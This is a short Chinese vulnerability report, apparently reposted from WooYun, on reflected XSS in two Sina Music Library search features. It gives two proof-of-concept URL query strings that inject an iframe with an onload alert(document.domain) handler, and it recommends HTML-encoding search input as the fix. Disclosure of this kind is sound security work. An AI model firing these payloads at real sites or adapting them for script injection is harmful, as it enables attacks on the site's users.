新浪乐库中的音乐话题搜索功能、以及关注人搜索功能存在反射型XSS漏洞

详细说明:

漏洞POC连接:

?name=%22%3E%3Ciframe%20onload%3Dalert(document.domain)%3E

?key=%22%3E%3Ciframe+onload%3Dalert%28document.domain%29%3E&type=list&sinaid=2181491501&atten=0

漏洞证明:

修复方案:

对用户的搜索输入在包含到响应之前进行HTML编码处理

新浪乐库两处搜索功能反射型XSS漏洞及修复

摘自  WebSPRing@乌云